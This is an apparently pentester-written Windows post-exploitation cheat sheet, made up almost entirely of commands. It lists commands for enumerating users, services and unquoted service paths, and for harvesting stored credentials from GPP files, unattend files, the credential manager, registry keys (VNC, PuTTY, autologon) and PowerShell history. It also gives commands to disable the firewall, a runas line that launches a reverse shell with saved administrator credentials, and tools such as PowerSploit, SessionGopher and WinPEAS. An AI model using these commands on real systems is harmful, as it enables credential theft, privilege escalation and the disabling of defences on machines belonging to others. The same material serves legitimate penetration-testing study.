Enumeration

Manual

System / Version Information

#Show Windows version and patchlevel:
ver
 
#Show all variables and paths:
set
 
#Show the hostname:
hostname
 
#Show summary of hardware information and system information:
systeminfo
 
#Check boot options (with BIOS firmware):
more c:\boot.ini
 
#Show applied patches:
wmic qfe
 
#Get OS architecture (x32 / x64):
wmic os get osarchitecture

User Enumeration

#Check your user rights, privileges and member groups:
whoami /all
 
#Get information about local user
net user
 
#Get Domain accounts:
net user /domain
 
#Any user member of administrators group: 
net localgroup Administrators
 
#Get information about a specific domain account:
net user jarnoadmin /domain
 
#Get domain groups:
net group /domain
 
#Anything in the register for auto logon:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
 
#Check who is currently logged in:
qwinsta

Processes

# Display all running applications and hosted processes:
tasklist /svc
 
# Display verbose task informations
tasklist /v

Services

#Get all services
powershell -command Get-Service
 
#Get services and as what user they are running:
wmic service get name,startname
 
#Get all services or change “state” to only view “active” or “inactive” services:
sc query type= service state= all
 
#Find a specific service:
sc query type= service state= all | findstr "%SERVICENAME%"
 
#Set service to start automatically:
sc config FreeSSHDService start= auto
 
#Start a service:
net start %SERVICENAME%
 
#check service rights:
sc qc %SERVICENAME%
 
#Find unquoted service paths:
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """

Password Policy

#Check password lockout policy:
net accounts

Password looting

Tools
- Seatbelt.exe

- PowerSploit
Get-CachedGPPPassword //For locally stored GP Files
Get-GPPPassword //For GP Files stored in the DC
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-RegistryAutoLogon

- msf
post/windows/gather/credentials/gpp

Group Policy Preferences

dir C:\ProgramData\Microsoft\Group Policy\History\<DOMAIN>\Machine\Preferences\Groups\Groups.xml
dir \\<DOMAIN>\SYSVOL\\Policies\<DOMAIN>\MACHINE\Preferences\Groups\Groups.xml

Services\Services.xml
ScheduledTasks\ScheduledTasks.xml
Printers\Printers.xml
Drives\Drives.xml
DataSources\DataSources.xml

Unattended Install files

dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\System32\Sysprep\unattend.xml 
C:\Windows\System32\Sysprep\Panther\unattend.xml

Credential manager

cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

In file name

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"

In file content

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul
findstr /spin "password" *.* 2>nul
dir /s *pass* == *vnc* == *.config* 2>nul (lot of output)

Get-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

In registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList

Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
In services
https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
Import-Module <full_path>\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Full path is mandatory for Import-Module

in Powershell history

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

Network Information

#Connection to other hosts or services available from inside:
netstat -ano
 
#Get information from the ARP table
arp -a
 
#Get IP information:
ipconfig /all
 
#Show current routing table:
route print

List all network shares

net share

Firewall Information

#Check firewall status:
netsh firewall show state
 
#Check configured firewall rules:
netsh firewall show config
 
#Check detailed configured firewall rules:
netsh advfirewall firewall show rule name=all
 
#Export detailed configured firewall rules:
netsh advfirewall export "firewall.txt"

to find whether windows defender is running or not :

sc query windefend

manually looking at the service to find whether third-party AV is working :

sc queryex type=service

List firewall’s blocked ports

$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports

Disable firewall

netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

Scheduled Tasks

#Get all scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
 
#Powershell version of above command:
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

Connected Devices

#Get logical disk information:
wmic logicaldisk get caption,description,providername

Installed Software

#Get installed software:
reg query HKEY_LOCAL_MACHINE\SOFTWARE
 
#List software folders with Powershell:
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime

Drivers

#Get all available drivers:
driverquery

Startup Items

#Get all startup items:
wmic startup get caption,command
 
#Get all startup items based on the run values in the register:
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
 
#Get all startup items that run on next startup based on the run values in the register:
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 
 
#List all startup shortcuts based on the start menu startup folder for every user:
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
 
#List all startup shortcuts based on the start menu startup folder for a specific user:
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

Plaintext Users and Passwords

#Find TXT files that contain the string “password”: 
findstr /si password *.txt
 
#Find XML files that contain the string “password”: 
findstr /si password *.xml
 
#Find INI files that contain the string “password”: 
findstr /si password *.ini
 
#Common files that usually contain credentials:
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini
 
#Common register paths that usually contain credentials:
#VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
 
#Windows autologin information:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
 
#SNMP parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
 
#Putty sessions:
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Stored Credentials

#Check for stored credentials:
cmdkey /list
 
#Use saved credentials:
runas /savecred /user:WORKGROUP\Administrator "your_rev_shell.exe"
 
#Find other interesting files based on filename like “password.txt”:
dir /a password.txt /s /p

Automatic

I like to use tools just to make this phase faster and don’t take much time with manual enumeration. and top tools I use are:

• WinPEAS

winPEAS.exe > output.txt

• PowerUp

Import-Module .\PowerUp.ps1
Invoke-AllChecks

• Exploit Suggester NG

python wes.py --update
systeminfo > systeminfo.txt
python wes.py systeminfo.txt

• PrivescCheck